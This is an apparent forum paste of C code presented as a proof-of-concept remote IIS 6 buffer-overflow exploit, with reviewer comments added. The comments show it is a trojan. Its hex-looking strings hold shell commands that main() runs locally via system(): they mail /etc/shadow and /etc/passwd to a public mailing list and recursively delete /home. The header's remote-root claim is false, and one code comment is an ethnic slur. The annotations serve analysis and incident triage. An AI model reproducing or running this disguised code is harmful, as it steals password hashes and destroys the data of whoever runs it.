xx
By: tezt | Date: Mar 25 2008 21:04 | Format: None | Expires: never | Size: 1.91 KB | Hits: 1310

  1. /* Proof of concept code
  2.    Please don't send us e-mails
  3.    asking us "how to hack" because
  4.    we will be forced to skullfsck you.
  5.  
  6. DISCLAIMER:
  7. !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
  8.  
  9.    IIS 6 Buffer Overflow Exploit
  10.  
  11.    BUG: inetinfo.exe improperly bound checks
  12.    http requests sent longer than 6998 chars.
  13.    Can get messy but enough testing, and we have
  14.    found a way in.
  15.  
  16.    VENDOR STATUS: Notified
  17.    FIX: In process
  18.  
  19.    Remote root.
  20.  
  21.    eg.
  22.    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
  23.     + Connecting to host...
  24.     + Connected.
  25.     + Inserting Shellcode...
  26.     + Done...
  27.     + Spawining shell..
  28.  
  29.     Microsoft Windows XP [Version 5.1.2600]
  30.    (C) Copyright 1985-2001 Microsoft Corp.
  31.    C:>
  32.  
  33. */
  // NOTE(review): despite the name, this is not machine code. Every "xNN" pair
  // is a printable ASCII byte value; the backslashes of the \x escapes appear
  // to have been lost in this paste, so as shown the literal is plain text.
  // Read as hex bytes, the string is a shell command line:
  //     /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
  // main() passes this array to system(), so the command targets the machine
  // that runs this program. Nothing here is sent to a remote host.
  34. char shellcode[] =
  35. "x2fx62x69x6ex2fx72x6dx20"
  36. "x2dx72x66x20x2fx68x6fx6d"
  37. "x65x2fx2ax3bx63x6cx65x61"
  38. "x72x3bx65x63x68x6fx20x62"
  39. "x6cx34x63x6bx68x34x74x2c"
  40. "x68x65x68x65";
  41.  
  // NOTE(review): the "xNN" pairs are ASCII byte values (the backslashes of the
  // \x escapes appear to have been lost in this paste). Read as hex bytes, the
  // string is a shell command line ending in a space:
  //     cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
  // That is, it pipes the local password-hash file to mail(1) addressed to a
  // public mailing list. main() runs it with system() on the local machine.
  42. char launcher [] =
  43. "x63x61x74x20x2fx65x74x63x2fx73"
  44. "x68x61x64x6fx77x20x7cx6dx61x69"
  45. "x6cx20x66x75x6cx6cx2dx64x69"
  46. "x73x63x6cx6fx73x75x72x65x40"
  47. "x6cx69x73x74x73x2ex67x72x6fx6b"
  48. "x2ex6fx72x67x2ex75x6bx20";
  49.  
  // NOTE(review): the name suggests a netcat shell, but the bytes do not contain
  // one. The "xNN" pairs are ASCII byte values (the backslashes of the \x
  // escapes appear to have been lost in this paste). Read as hex bytes, the
  // string is a shell command line ending in a space:
  //     cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
  // It differs from `launcher` only in the file it reads (/etc/passwd instead
  // of /etc/shadow). main() runs it with system() on the local machine.
  50. char netcat_shell [] =
  51. "x63x61x74x20x2fx65x74x63x2fx70"
  52. "x61x73x73x77x64x20x7cx6dx61x69"
  53. "x6cx20x66x75x6cx6cx2dx64x69"
  54. "x73x63x6cx6fx73x75x72x65x40"
  55. "x6cx69x73x74x73x2ex67x72x6fx6b"
  56. "x2ex6fx72x67x2ex75x6bx20";
  57.  
  // NOTE(review): entry point. It declares no parameters, so the host and
  // "-p 80" from the header's usage example are never read, and no statement
  // here opens a socket or sends an HTTP request. The function hands the three
  // global strings to system(), prints a single "." and returns 0.
  // The header's description (remote IIS 6 overflow) is not backed by any code
  // in this listing. No #include lines for system() or printf() appear either.
  58. main()
  59. {
  60.  
  61. //Section Initialises designs implemented by mexicans
  62. //Imigrate
  // Each call runs its string through the local command interpreter, in this
  // order. Read as hex bytes (\x escapes intact), launcher and netcat_shell pipe
  // /etc/shadow and /etc/passwd to mail(1) for a public mailing list, and
  // shellcode recursively deletes everything under /home, then clears the
  // screen and echoes a taunt. The effect is on the account and host running
  // this program, and is worst when run as root, as the header's "#" prompt
  // invites.
  // Triage for a host where a copy with intact escapes was run: treat the
  // local password hashes as disclosed (rotate credentials), check the outbound
  // mail queue and logs, and restore /home from backup.
  63. system(launcher);
  64. system(netcat_shell);
  65. system(shellcode);
  66.  
  // Everything below that looks like networking is commented out and never
  // compiled.
  67. //int socket = 0;
  68. //double long port = 0.0;
  69.  
  70. //#DEFINE port host address
  71. //#DEFINE number of inters
  72. //#DEFINE gull eeuEE
  73.  
  // The for header is commented out, so the braces below form a plain block
  // that executes exactly once.
  74. // for(int j; j < 30; j++)
  75.         {
  76.         //Find socket remote address fault
  77.         printf(".");
  78.         }
  79. //overtake inetinfo here IIS_666666^
  80. return 0;
  81. }